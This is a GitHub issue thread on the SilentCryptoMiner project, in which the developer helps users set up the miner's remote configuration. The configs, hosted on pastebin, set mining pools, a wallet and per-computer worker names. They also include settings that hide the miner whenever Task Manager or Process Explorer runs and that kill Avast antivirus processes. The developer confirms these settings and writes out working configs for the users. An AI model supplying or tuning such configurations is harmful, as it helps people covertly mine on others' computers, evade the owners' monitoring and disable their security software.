### ISSUE TITLE
Remote configuration

### ISSUE THREAD

**Issue by VK-VZ** [UnamSanctam/SilentCryptoMiner#1985]
Hello.  I didn't quite understand about the remote configuration.  https://github.com/UnamSanctam/SilentCryptoMiner/wiki/CPU-Miner#remote-configuration I did everything as written here.  Is this necessary for emergency connection?  What about the panel?  Is there an option in the panel to change the configuration, how does it work and can I just check the box in the builder and not provide a link with the configuration to the postbin?

**Comment by VK-VZ** [comment]
The settings from the postbin link will be used as the main settings, right?  Will the api-endpoint url be taken from the builder?

**Comment by VK-VZ** [comment]
That is, if I write a remote configuration link in this form 
{
    "algo": "rx/0",
    "pool": "ru.zephyr.herominers.com",
    "port": 1123,
    "wallet": "ZEPHYR729dcmJi4L8L2LuaEq2jfhv9pAJRjdxWdPwHcZN7WDR1GGsxBhrWNdcmJi4L8L2LuaEq2JZQgrJsWEKWd9T9SYq3AhEwg1G.{COMPUTERNAME}",
    "password": "",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 20,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,",
    "stealth-fullscreen": false
}
and I will have a link to the api endpoint url in the builder, then I don't need to add to the remote configuration: "api-endpoint": "API Endpoint URL",?

It turns out that the miner takes the basic settings from https://pastebin .com/raw/mpRWix6f, and the rest of the information, including the "api endpoint url", from the builder?

**Comment by UnamSanctam** [comment]
Sorry for the late response. Yes that's correct, any setting that you don't write in the "Remote Configuration" or web panel configuration will be taken from the builder instead.

**Comment by VK-VZ** [comment]
Thank you 👍

**Comment by UnamSanctam** [comment]
The "Remote Configuration" has a higher priority than the builder, so it should use the "Remote Configuration" settings as long as they work.

**Comment by VK-VZ** [comment]
So I made a mistake. Help me find it, please. I wrote 2 raw links, and separated them only with a comma, without a space. Perhaps you need to insert a space? 
![Screenshot_20231130_014523_Microsoft Remote Desktop](https://github.com/UnamSanctam/SilentCryptoMiner/assets/149912866/a2a30081-9f6f-4243-9307-be978ddfde5d)

**Comment by UnamSanctam** [comment]
Only a comma (,) like you did is correct. I assume the problem is that for HeroMiners I believe you need to enter the worker name inside the "password" option instead of the "wallet" option.

**Comment by VK-VZ** [comment]
Thank you.  I'm going to try now

**Comment by VK-VZ** [comment]
I'm doing something wrong.  Please make the correct settings for me.  I will be very grateful to you.
CPU Miner: ZEPHYR:
• Basic setup: https://zephyr.herominers.com/
• Failover/backup: https://zephyr.miningocean.org/
GPU miner: 
• Basic setup: NEURAI (XNA) - https://xna.2miners.com/
• Failover/backup: Clore(CLORE) - https://vipor.net

**Comment by VK-VZ** [comment]
You will help?  )

**Comment by UnamSanctam** [comment]
Yes sorry for not responding, my email notifications weren't working when you previously responded so I didn't see that one. For HeroMiners Zephyr it should be something like this:
```
{
"algo": "rx/0",
"pool": "ru.zephyr.herominers.com",
"port": 1123,
"wallet": "ZEPHWallet",
"password": "{COMPUTERNAME}",
"nicehash": false,
"ssltls": true
}
```
I left out the other settings in case you already set those in the builder, if you didn't then you can add those back.

**Comment by VK-VZ** [comment]
Thanks for answering.  Write more for GPU please)

**Comment by VK-VZ** [comment]
Thanks a lot🙂

**Comment by UnamSanctam** [comment]
That should work, you can try some other pool server instead of ru.zephyr.herominers.com and see if that works for you.

**Comment by svox07** [comment]
Hello Unam, tell me the name of the worker, should I insert password?

**Comment by svox07** [comment]
![Screenshot_20231229-221133](https://github.com/UnamSanctam/SilentCryptoMiner/assets/70852343/0956036e-8686-4cbe-896a-d8eaa9df6e2a)

**Comment by UnamSanctam** [comment]
Yes for MiningOcean the worker name is the password, so that configuration is correct.
